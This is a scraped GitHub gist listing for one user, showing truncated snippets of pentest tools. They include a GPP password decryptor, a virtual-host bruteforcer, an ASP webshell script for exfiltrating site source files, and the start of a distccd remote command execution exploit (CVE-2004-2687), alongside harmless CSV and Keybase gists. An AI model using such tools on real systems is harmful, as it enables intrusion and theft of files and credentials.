ypcrts
/ 1password_to_keepass_compatible_csv.py
Created
May 8, 2018 17:37
1Password CSV transform to KeepassXC compatible CSV (2018)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| @author ypcrts | |
| @date 2018-05-01 | |
| tested on win 10, python 3.6.4 | |
| uses only python standard library | |
| KeepassXC has parser some CSV parser bugs / difficulties | |
| because it supports only a subset of the CSV format | |
| spectrum. This script is an attempt to port 1Password |
ypcrts
/ gist:d9e2662e289a6b6677d570ef7ac9f54a
Created
June 28, 2018 23:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am ypcrts on github. | |
| * I am ypcrts (https://keybase.io/ypcrts) on keybase. | |
| * I have a public key ASAoO1UCMSlKJl_2afLruX268uImNIKplH8eyFZmMGspkAo | |
| To claim this, I am signing this object: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys | |
| fp = open(sys.argv[1], 'r') | |
| fo = open(sys.argv[1] + ".done", 'w') | |
| while True: | |
| line = fp.readline().strip() | |
| if not line: |
ypcrts
/ gpp_decrypt.rb
Created
August 1, 2018 18:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'rubygems' | |
| require 'openssl' | |
| require 'base64' | |
| encrypted_data = "SOMETHING/HERE" | |
| def decrypt(encrypted_data) | |
| padding = "=" * (4 - (encrypted_data.length % 4)) | |
| epassword = "#{encrypted_data}#{padding}" | |
| decoded = Base64.decode64(epassword) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function attack() { | |
| const rows = document.querySelectorAll('.plugin-details-output table tbody tr'); | |
| var ret = []; | |
| rows.forEach(row => { | |
| const port = "Port " + row.querySelector('.port span').innerText.match(/\d{1,7}/)[0]; | |
| row.querySelectorAll('.hosts a').forEach(host => { | |
| if (!ret[port]) | |
| ret[port] = new Set([]); | |
| ret[port].add(host.attributes['data-host-id'].nodeValue); | |
| }); |
ypcrts
/ virtualhost_bruteforcer.go
Last active
May 4, 2019 02:11
Golang HTTP virtual host bruteforcer, with concurrency
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import "net/http" | |
| import "fmt" | |
| import "io/ioutil" | |
| import "bufio" | |
| import "os" | |
| // golang virtualhost bruteforcer with concurrency | |
| func makeRequest(subdomain string) bool { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function () { | |
| var s = new Set(); | |
| document.querySelectorAll('.actor-name').forEach( e=> { | |
| s.add(e.innerText) | |
| }); | |
| console.log(s) | |
| })() |
ypcrts
/ asp_webshell_source_exfil.py
Last active
August 12, 2019 20:38
rsync for dot net // asp webshell exploited to download all files recursively
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import os | |
| import os.path | |
| import re | |
| # using fuzzdb webshell | |
| # https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx | |
| shell_url = 'https://example.com/vulnerable' | |
| cmd_output_re = re.compile(r'.*\<pre\>(.*)\</pre\>', re.DOTALL) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const j = new Set; | |
| document.querySelectorAll('.actor-name').forEach(e => j.add(e.innerText)); | |
| document.querySelector('#ember2469').click(); |
ypcrts
/ distccd_rce_CVE-2004-2687.py
Created
December 13, 2019 14:47
— forked from DarkCoderSc/distccd_rce_CVE-2004-2687.py
(CVE-2004-2687) DistCC Daemon - Command Execution (Python)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| ''' | |
| distccd v1 RCE (CVE-2004-2687) | |
| This exploit is ported from a public Metasploit exploit code : | |
| https://www.exploit-db.com/exploits/9915 |
OlderNewer